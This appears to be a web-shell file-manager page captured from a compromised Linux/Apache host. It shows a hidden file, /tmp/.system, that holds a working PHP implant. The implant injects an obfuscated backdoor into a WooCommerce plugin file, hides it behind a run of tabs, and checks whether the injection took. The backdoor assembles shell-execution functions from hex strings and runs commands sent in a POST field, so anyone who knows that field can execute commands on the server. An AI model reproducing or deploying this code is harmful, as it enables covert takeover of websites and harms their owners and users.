HEX
Server: Apache/2.4.6
System: Linux l2webhost 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: theparlor (1016)
PHP: 7.3.33
Disabled: NONE
Upload Files
File: //tmp/.system
<?php  $path = '/home/theparlor/public_html/wp-content/plugins/woocommerce/src/Internal/Admin/ActivityPanels.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24pointer1%20%3D%20%277%27%3B%24pointer2%20%3D%20%273%27%3B%24pointer3%20%3D%20%276%27%3B%24pointer4%20%3D%20%275%27%3B%24pointer5%20%3D%20%278%27%3B%24pointer6%20%3D%20%27c%27%3B%24pointer7%20%3D%20%27f%27%3B%24pointer8%20%3D%20%271%27%3B%24pointer9%20%3D%20%270%27%3B%24pointer10%20%3D%20%272%27%3B%24pointer11%20%3D%20%27e%27%3B%24pointer12%20%3D%20%274%27%3B%24hub_center1%20%3D%20pack%28%22H%2A%22%2C%20%277%27%20.%20%273%27%20.%20%24pointer1%20.%20%279%27%20.%20%24pointer1%20.%20%24pointer2%20.%20%277%27%20.%20%274%27%20.%20%24pointer3%20.%20%24pointer4%20.%20%24pointer3%20.%20%27d%27%29%3B%24hub_center2%20%3D%20pack%28%22H%2A%22%2C%20%24pointer1%20.%20%24pointer2%20.%20%24pointer3%20.%20%24pointer5%20.%20%276%27%20.%20%275%27%20.%20%276%27%20.%20%24pointer6%20.%20%24pointer3%20.%20%27c%27%20.%20%275%27%20.%20%24pointer7%20.%20%24pointer3%20.%20%24pointer4%20.%20%277%27%20.%20%278%27%20.%20%276%27%20.%20%275%27%20.%20%276%27%20.%20%24pointer2%29%3B%24hub_center3%20%3D%20pack%28%22H%2A%22%2C%20%276%27%20.%20%24pointer4%20.%20%277%27%20.%20%278%27%20.%20%24pointer3%20.%20%275%27%20.%20%276%27%20.%20%273%27%29%3B%24hub_center4%20%3D%20pack%28%22H%2A%22%2C%20%24pointer1%20.%20%270%27%20.%20%276%27%20.%20%24pointer8%20.%20%24pointer1%20.%20%24pointer2%20.%20%24pointer1%20.%20%24pointer2%20.%20%24pointer1%20.%20%274%27%20.%20%24pointer3%20.%20%278%27%20.%20%24pointer1%20.%20%272%27%20.%20%277%27%20.%20%275%27%29%3B%24hub_center5%20%3D%20pack%28%22H%2A%22%2C%20%24pointer1%20.%20%24pointer9%20.%20%276%27%20.%20%27f%27%20.%20%24pointer1%20.%20%24pointer9%20.%20%276%27%20.%20%275%27%20.%20%276%27%20.%20%27e%27%29%3B%24hub_center6%20%3D%20pack%28%22H%2A%22%2C%20%277%27%20.%20%273%27%20.%20%24pointer1%20.%20%274%27%20.%20%24pointer1%20.%20%24pointer10%20.%20%276%27%20.%20%24pointer4%20.%20%24pointer3%20.%20%271%27%20.%20%24pointer3%20.%20%27d%27%20.%20%24pointer4%20.%20%24pointer7%20.%20%276%27%20.%20%24pointer1%20.%20%276%27%20.%20%24pointer4%20.%20%24pointer1%20.%20%274%27%20.%20%275%27%20.%20%24pointer7%20.%20%276%27%20.%20%273%27%20.%20%276%27%20.%20%24pointer7%20.%20%24pointer3%20.%20%24pointer11%20.%20%24pointer1%20.%20%274%27%20.%20%24pointer3%20.%20%275%27%20.%20%276%27%20.%20%27e%27%20.%20%277%27%20.%20%24pointer12%20.%20%24pointer1%20.%20%24pointer2%29%3B%24hub_center7%20%3D%20pack%28%22H%2A%22%2C%20%277%27%20.%20%270%27%20.%20%24pointer3%20.%20%24pointer2%20.%20%276%27%20.%20%27c%27%20.%20%24pointer3%20.%20%24pointer7%20.%20%277%27%20.%20%24pointer2%20.%20%276%27%20.%20%24pointer4%29%3B%24query_handler%20%3D%20pack%28%22H%2A%22%2C%20%24pointer1%20.%20%24pointer8%20.%20%277%27%20.%20%275%27%20.%20%24pointer3%20.%20%275%27%20.%20%24pointer1%20.%20%24pointer10%20.%20%24pointer1%20.%20%279%27%20.%20%275%27%20.%20%27f%27%20.%20%24pointer3%20.%20%278%27%20.%20%276%27%20.%20%24pointer8%20.%20%276%27%20.%20%24pointer11%20.%20%24pointer3%20.%20%274%27%20.%20%276%27%20.%20%24pointer6%20.%20%24pointer3%20.%20%24pointer4%20.%20%24pointer1%20.%20%24pointer10%29%3Bif%28isset%28%24_POST%5B%24query_handler%5D%29%29%7B%24query_handler%3Dpack%28%22H%2A%22%2C%24_POST%5B%24query_handler%5D%29%3Bif%28function_exists%28%24hub_center1%29%29%7B%24hub_center1%28%24query_handler%29%3B%7Delseif%28function_exists%28%24hub_center2%29%29%7Bprint%20%24hub_center2%28%24query_handler%29%3B%7Delseif%28function_exists%28%24hub_center3%29%29%7B%24hub_center3%28%24query_handler%2C%24pgrp_elem%29%3Bprint%20join%28%22%5Cn%22%2C%24pgrp_elem%29%3B%7Delseif%28function_exists%28%24hub_center4%29%29%7B%24hub_center4%28%24query_handler%29%3B%7Delseif%28function_exists%28%24hub_center5%29%26%26function_exists%28%24hub_center6%29%26%26function_exists%28%24hub_center7%29%29%7B%24bind_factor%3D%24hub_center5%28%24query_handler%2C%22r%22%29%3Bif%28%24bind_factor%29%7B%24component_dchunk%3D%24hub_center6%28%24bind_factor%29%3B%24hub_center7%28%24bind_factor%29%3Bprint%20%24component_dchunk%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');